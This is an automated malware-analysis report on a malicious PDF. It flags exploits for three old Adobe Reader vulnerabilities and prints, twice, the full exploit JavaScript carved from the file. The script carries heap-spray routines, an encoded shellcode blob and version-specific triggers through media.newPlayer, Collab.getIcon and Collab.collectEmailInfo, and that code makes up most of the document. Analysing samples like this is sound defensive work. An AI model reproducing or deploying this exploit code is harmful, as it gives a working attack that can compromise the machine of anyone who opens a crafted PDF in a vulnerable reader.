Verdict: MALICIOUS
Risk Score: 372
MITRE ATT&CK: T1059.001 PowerShell
Malware Insights
The PDF file was flagged as malicious by an ML classifier with high confidence. Heuristics indicate the presence of embedded JavaScript, suggesting an attempt to execute code. The specific intent of the script cannot be determined due to obfuscation, but it is likely to download and execute a second-stage payload.
Machine Learning
- Nyx PDF Classifier malicious score 0.9982
Heuristics (10)
- media.newPlayer, CVE-2009-4324 (critical; CVE exact match; rule CVE_2009_4324): PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(). Actively exploited as a zero-day in December 2009. (matched in decompressed stream)
- Collab.getIcon, CVE-2009-0927 (critical; CVE exact match; rule CVE_2009_0927): PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument. Allows arbitrary code execution. (matched in decompressed stream)
- Collab.collectEmailInfo, CVE-2007-5659 (critical; CVE exact match; rule CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
- JavaScript action (low; 2 related findings; rule PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- PDF JavaScript exploit cluster (critical; rule PDF_JS_EXPLOIT_CLUSTER): PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior. Matched line in script: var ret = unescape("%u0c0c%u0c0c");
- Embedded JS stream (low; rule PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high; rule PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Object number defined twice with different bodies (info; rule PDF_DUPLICATE_OBJ_BODY_INCREMENTAL): The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Suspicious extracted artifact (info; rule EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info; rule EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All seven URLs below were found in PDF document text; they are the standard XMP/RDF metadata namespace identifiers, not download locations.
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in PDF document text)
  - http://ns.adobe.com/pdf/1.3/ (in PDF document text)
  - http://ns.adobe.com/pdfx/1.3/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/ (in PDF document text)
  - http://ns.adobe.com/xap/1.0/mm/ (in PDF document text)
  - http://purl.org/dc/elements/1.1/ (in PDF document text)
  - http://ns.adobe.com/photoshop/1.0/ (in PDF document text)
Extracted artifacts (5)
Files carved from inside the sample during analysis.

javascript_obj0043_000.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 43 at offset 0x2430
- Size: 2172 bytes
- SHA-256: 6a4feff50242ca48bccb7b8303874c63d44c492cea43499d20ce94d354dc031d
Preview script (first 1,000 lines of the extracted script):
<</Length 2116/Filter[/FlateDecode]>>stream
[binary: the preview shows the still-compressed FlateDecode stream bytes (Length 2116), which are not printable and are omitted here]
endstrea
javascript_obj0043_001.js
- Kind: pdf-javascript-stream
- Source: PDF /JS object 43 at offset 0x2465
- Size: 6463 bytes
- SHA-256: 72a7a81874bc825243697fb1380a9dc969da68bf826f90ff5241fdd360dd07a9
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX4a4bXX4647";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
var k = 0;
while (k < 200)
{
memory[k]=sprblk+scblk;
k++;
}
}
function repeat(count,what){
var v = "";
while (--count >= 0) v += what;
return v;
}
var s = "XX23ebXX4840XX5f43XX5b57XX8b66XX3c03XX7430XX2c1bXXc063XX04e0XXec80XX8043XX0fe4XXc402XXea34XX0788XX4343XXeb47XXe8e3XXffd8XXffffXX4e69XX4963XX4d71XX4571XX4d71XX4d71XX4d6bXX4563XX4d71XX4d71XX4d71XX4d71XX446eXX4e69XX4463XX4967XX4d72XX4d6dXX4d71XX4463XX4d70XX4f72XX526bXX4364XX4d72XX4963XX506aXX4c71XX4971XX4967XX4571XX4366XX4f6cXX4a67XX446aXX4a6cXX4866XX4464XX506aXX4a64XX4871XX476cXX4566XX4b63XX4c6cXX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4864XX4f67XX4c64XX4e6fXX4d6cXX516bXX4e67XX4d70XX4d71XX4d71XX4d71XX4469XX4d6dXX4971XX4469XX4d6cXX4972XX4a67XX4469XX4d6dXX4571XX4669XX4c69XX4a65XX4d72XX4d6dXX4d71XX4964XX4a69XX4468XX5268XX4d72XX4d6dXX4d71XX4c70XX4665XX4e68XX4f71XX4563XX506fXX4e71XX4d71XX4d71XX4c69XX5065XX5171XX4b63XX4f64XX4964XX4c70XX4d65XX4c70XX4b66XX4f6bXX4368XX476eXX4c65XX4469XX4c68XX4665XX4d72XX4d6dXX4d71XX4f6bXX4469XX4f71XX4f6bXX4470XX4d66XX516cXX5171XX4f6dXX4f6dXX4463XX5164XX4669XX4c68XX4e63XX4d72XX4d6dXX4d71XX4c70XX4f64XX4a68XX4d71XX4d6fXX4d71XX4d71XX4463XX4c72XX436bXX4d71XX4f6eXX4864XX4c6aXX4e65XX4d72XX4d6dXX4d71XX4c69XX4564XX4864XX516cXX5171XX4470XX5265XX506cXX4671XX4f6dXX4e69XX4764XX4d71XX4d72XX4d71XX4d71XX4b6cXX5263XX4669XX4c68XX4666XX4d72XX4d6dXX4d71XX4469XX4563XX5271XX4d71XX4571XX4d71XX4d71XX4d6eXX436bXX4d6dXX4864XX4c6aXX4668XX4d72XX4d6dXX4d71XX4669XX4c69XX4e66XX4d72XX4d6dXX4d71XX4c71XX5265XX4669XX4c69XX5266XX4d72XX4d6dXX4d71XX436bXX4d71XX436bXX4d71XX436bXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX4a68XX4d72XX4d6dXX4d71XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4a69XX4468XX4a66XX4d72XX4d6dXX4d71XX4469XX4c6aXX4666XX4d72XX4d6dXX4d71XX4a69XX4c69XX5068XX4e72XX4d6dXX4d71XX4d6eXX4f6eXX436bXX4d71XX506eXX526eXX4f6eXX4b6eXX4864XX4c68XX4e63XX4d72XX4d6dXX4d71XX4864XX4c67XX5268XX4d72XX4d6dXX4d71XX4471XX4d65XX526cXX4b71XX4463XX4d6bXX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4469XX4f71XX4a70XX526fXX4d6eXX516dXX4f6dXX516cXX4971XX4469XX4c68XX4666XX4d72XX4d6dXX4d71XX4f6dXX4663XX446eXX4864XX486
4XX4864XX4469XX4c68XX4e66XX4d72XX4d6dXX4d71XX4c70XX4665XX4368XX4364XX4464XX4964XX4a64XX4463XX4571XX4469XX4f71XX4470XX4b65XX516cXX4f71XX4f6dXX4e6dXX4470XX4a65XX4b6cXX5164XX4c69XX4f65XX5171XX4469XX4468XX5266XX4d72XX4d6dXX4d71XX4668XX4d71XX5071XX4d71XX4d71XX5167XX4b63XX4a64XX4469XX4468XX4e66XX4d72XX4d6dXX4d71XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX4864XX4c68XX5266XX4d72XX4d6dXX4d71XX4c65XX4864XX4c68XX4666XX4d72XX4d6dXX4d71XX4864XX4c6aXX5265XX4d72XX4d6dXX4d71XX436bXX4d71XX4864XX4c6aXX4665XX4d72XX4d6dXX4d71XX4c65XX4d6bXX4469XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c71XX4f6cXX4970XX4469XX4f6cXX456cXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4f6eXX4469XX476dXX4572XX4469XX4f6cXX4d6fXX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4c70XX4d65XX4c70XX4b66XX4f6eXX4469XX4f70XX4c71XX4c68XX4a65XX4d72XX4d6dXX4d71XX4967XX4570XX4d63XX516cXX5071XX4e65XX4365XX4a71XX4c71XX4d66XX4463XX5164XX4470XX5072XX516cXX4671XX476eXX4c69XX4f65XX5171XX466dXX516cXX5270XX4463XX4966XX476eXX4469XX4f66XX476eXX446fXX4f6eXX4d6fXX446fXX4c6aXX4a65XX4d72XX4d6dXX4d71XX4e66XX4363XX4c71XX4f6eXX516fXX4c71XX4c6aXX4a65XX4d72XX4d6dXX4d71XX4871XX5068XX4b71XX4e65XX4d63XX4b71XX4c71XX4f6dXX4972XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4469XX4d71XX4c71XX4c69XX4a65XX4d72XX4d6dXX4d71XX4669XX5071XX4463XX4e71XX476eXX4e6bXX4c65XX3030"
function exp8() {
var spd = "XX000aXX000aXX000aXX000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
javascript_obj0043_001_shellcode_00.bin
- Kind: pdf-js-shellcode
- Source: pdf-js-unescape-shellcode recovered from PDF /JS object 43 at offset 0x2465
- Size: 72 bytes
- SHA-256: 1d18be7a9a735b4efb9816cbf36ca8f2995fa7e3951c97e5ce9977168aa1280b

generic_stage_recovery_000.js
- Kind: deobfuscated-js
- Source: generic stage recovery marker-XX-to-%u from combined JavaScript objects at offset 0x2430
- Size: 5838 bytes
- SHA-256: 16ae11897d85015a75a4476aa5d780ff0fb25880746f1a6e954a1c4f5329200c
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 20 eval/decoder/string-building token(s).
Preview script (first 1,000 lines of the extracted script):
%u23eb%u4840%u5f43%u5b57%u8b66%u3c03%u7430%u2c1b%uc063%u04e0%uec80%u8043%u0fe4%uc402%uea34%u0788%u4343%ueb47%ue8e3%uffd8%uffff%u4e69%u4963%u4d71%u4571%u4d71%u4d71%u4d6b%u4563%u4d71%u4d71%u4d71%u4d71%u446e%u4e69%u4463%u4967%u4d72%u4d6d%u4d71%u4463%u4d70%u4f72%u526b%u4364%u4d72%u4963%u506a%u4c71%u4971%u4967%u4571%u4366%u4f6c%u4a67%u446a%u4a6c%u4866%u4464%u506a%u4a64%u4871%u476c%u4566%u4b63%u4c6c%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4864%u4f67%u4c64%u4e6f%u4d6c%u516b%u4e67%u4d70%u4d71%u4d71%u4d71%u4469%u4d6d%u4971%u4469%u4d6c%u4972%u4a67%u4469%u4d6d%u4571%u4669%u4c69%u4a65%u4d72%u4d6d%u4d71%u4964%u4a69%u4468%u5268%u4d72%u4d6d%u4d71%u4c70%u4665%u4e68%u4f71%u4563%u506f%u4e71%u4d71%u4d71%u4c69%u5065%u5171%u4b63%u4f64%u4964%u4c70%u4d65%u4c70%u4b66%u4f6b%u4368%u476e%u4c65%u4469%u4c68%u4665%u4d72%u4d6d%u4d71%u4f6b%u4469%u4f71%u4f6b%u4470%u4d66%u516c%u5171%u4f6d%u4f6d%u4463%u5164%u4669%u4c68%u4e63%u4d72%u4d6d%u4d71%u4c70%u4f64%u4a68%u4d71%u4d6f%u4d71%u4d71%u4463%u4c72%u436b%u4d71%u4f6e%u4864%u4c6a%u4e65%u4d72%u4d6d%u4d71%u4c69%u4564%u4864%u516c%u5171%u4470%u5265%u506c%u4671%u4f6d%u4e69%u4764%u4d71%u4d72%u4d71%u4d71%u4b6c%u5263%u4669%u4c68%u4666%u4d72%u4d6d%u4d71%u4469%u4563%u5271%u4d71%u4571%u4d71%u4d71%u4d6e%u436b%u4d6d%u4864%u4c6a%u4668%u4d72%u4d6d%u4d71%u4669%u4c69%u4e66%u4d72%u4d6d%u4d71%u4c71%u5265%u4669%u4c69%u5266%u4d72%u4d6d%u4d71%u436b%u4d71%u436b%u4d71%u436b%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u4a68%u4d72%u4d6d%u4d71%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4a69%u4468%u4a66%u4d72%u4d6d%u4d71%u4469%u4c6a%u4666%u4d72%u4d6d%u4d71%u4a69%u4c69%u5068%u4e72%u4d6d%u4d71%u4d6e%u4f6e%u436b%u4d71%u506e%u526e%u4f6e%u4b6e%u4864%u4c68%u4e63%u4d72%u4d6d%u4d71%u4864%u4c67%u5268%u4d72%u4d6d%u4d71%u4471%u4d65%u526c%u4b71%u4463%u4d6b%u4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4469%u4f71%u4a70%u526f%u4d6e%u516d%u4f6d%u516c%u4971%u4469%u4c68%u4666%u4d72%u4d6d%u4d71%u4f6d%u4663%u446e%u4864%u4864%u4864%u
4469%u4c68%u4e66%u4d72%u4d6d%u4d71%u4c70%u4665%u4368%u4364%u4464%u4964%u4a64%u4463%u4571%u4469%u4f71%u4470%u4b65%u516c%u4f71%u4f6d%u4e6d%u4470%u4a65%u4b6c%u5164%u4c69%u4f65%u5171%u4469%u4468%u5266%u4d72%u4d6d%u4d71%u4668%u4d71%u5071%u4d71%u4d71%u5167%u4b63%u4a64%u4469%u4468%u4e66%u4d72%u4d6d%u4d71%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u4864%u4c68%u5266%u4d72%u4d6d%u4d71%u4c65%u4864%u4c68%u4666%u4d72%u4d6d%u4d71%u4864%u4c6a%u5265%u4d72%u4d6d%u4d71%u436b%u4d71%u4864%u4c6a%u4665%u4d72%u4d6d%u4d71%u4c65%u4d6b%u4469%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c71%u4f6c%u4970%u4469%u4f6c%u456c%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4f6e%u4469%u476d%u4572%u4469%u4f6c%u4d6f%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4c70%u4d65%u4c70%u4b66%u4f6e%u4469%u4f70%u4c71%u4c68%u4a65%u4d72%u4d6d%u4d71%u4967%u4570%u4d63%u516c%u5071%u4e65%u4365%u4a71%u4c71%u4d66%u4463%u5164%u4470%u5072%u516c%u4671%u476e%u4c69%u4f65%u5171%u466d%u516c%u5270%u4463%u4966%u476e%u4469%u4f66%u476e%u446f%u4f6e%u4d6f%u446f%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4e66%u4363%u4c71%u4f6e%u516f%u4c71%u4c6a%u4a65%u4d72%u4d6d%u4d71%u4871%u5068%u4b71%u4e65%u4d63%u4b71%u4c71%u4f6d%u4972%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4469%u4d71%u4c71%u4c69%u4a65%u4d72%u4d6d%u4d71%u4669%u5071%u4463%u4e71%u476e%u4e6b%u4c65%u3030"
function exp8() {
var spd = "%u000a%u000a%u000a%u000a";
var esc = unescape;
var spr = esc(urpl(spd));
var of = repeat(4096, spr);
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//javascript comment
Collab["\x67\x65\x74\x49\x63\x6f\x6e"](of+a[0x0]);
}
function exp9() {
var esprpl=unescape;
var sc = esprpl(urpl(s));
var ret = unescape("%u0c0c%u0c0c");
var sc2 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u6b62%u546e%u596a%u6c76%u506a%u5470%u666f%u7441%u4356%u586c%u726d%u4153%u4b4a%u624c%u7948%u4659%u6156%u7761%u7051%u7842%u5342%u4a64%u6365%u7464%u4972%u5766%u534d%u7569");
while(ret.length <= 0x8000) ret+=ret;
ret=ret.substring(0,0x8000 - s.length);
memory=new Array();
for(i=0;i<0x2000;i++) {
memory[i]= ret + sc;
}
util.printd("jbBFAXmYeqFJUPOXePHkjhAybWoldsgWfmBw", new Date());
util.printd("noCXCPHRXLpZKyNpKJJWxBkvpjKLYwpMfmCG", new Date());
try {this.media.newPlayer(null);} catch(e) {}
util.printd(sc2, new Date());
}
function start()
{
var esprpl=unescape;
var sc = esprpl(urpl(s));
if (app.viewerVersion >= 7.0)
{
plin = repeat(1124,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u0b0b%u0028%u0aeb%u0aeb") + unescape("%u4346%u4a4b") + repeat(122,unescape("%u0b0b%u0028%u06eb%u06eb")) + unescape("%u4a4b%u4748%u4a4b%u4748%u4a4b%u4748") + sc + repeat(1256,unescape("%u4a4b%u4748"));
}
else
{
ef6 = unescape("%uf6eb%uf6eb") + unescape("%u0b0b%u0019");
plin = repeat(80,unescape("%u4141%u4141")) + sc + repeat(80,unescape("%u4241%u4142"))+ unescape("%uf7e9%ufff9")
+unescape("%uffff%uffff") + unescape("%uf6eb%uf4eb") + unescape("%uf2eb%uf1eb");
while ((plin.length % 8) != 0)
plin = unescape("%u4141") + plin;
plin += repeat(2626,ef6);
}
if (app.viewerVersion >= 6.0)
{
var a=[];//javascript for adobe
Collab["\x63\x6f\x6c\x6c\x65\x63\x74\x45\x6d\x61\x69\x6c\x49\x6e\x66\x6f"]({subj:a[0x0],msg:plin});
}
}
var ver = app.viewerVersion
if ((ver >= 9.1) || ((ver > 8.102) && (ver < 9.0)))
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp9()",1200);
else
exp9();
}
else
{
if(ver >= 8.0)
{
xxsc(s);
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("exp8()",1200);
else
exp8();
}
else
{
if(ver >= 6.0)
{
var inBrowser = this.external;
if (inBrowser)
var shaft = app.setTimeOut("start()",1200);
else
start();
}
else
{
while(1){};
}
}
}
combined_document_js_000.js
- Kind: deobfuscated-js
- Source: combined document JavaScript streams at offset 0x2430
- Size: 8636 bytes
- SHA-256: 6b274891890bf0d519e3384adb17e8bb7394a4452b3b364e01a340896daea0d1
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 20 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script: identical to the javascript_obj0043_000.js raw stream preview followed by the javascript_obj0043_001.js script preview shown above; not repeated here.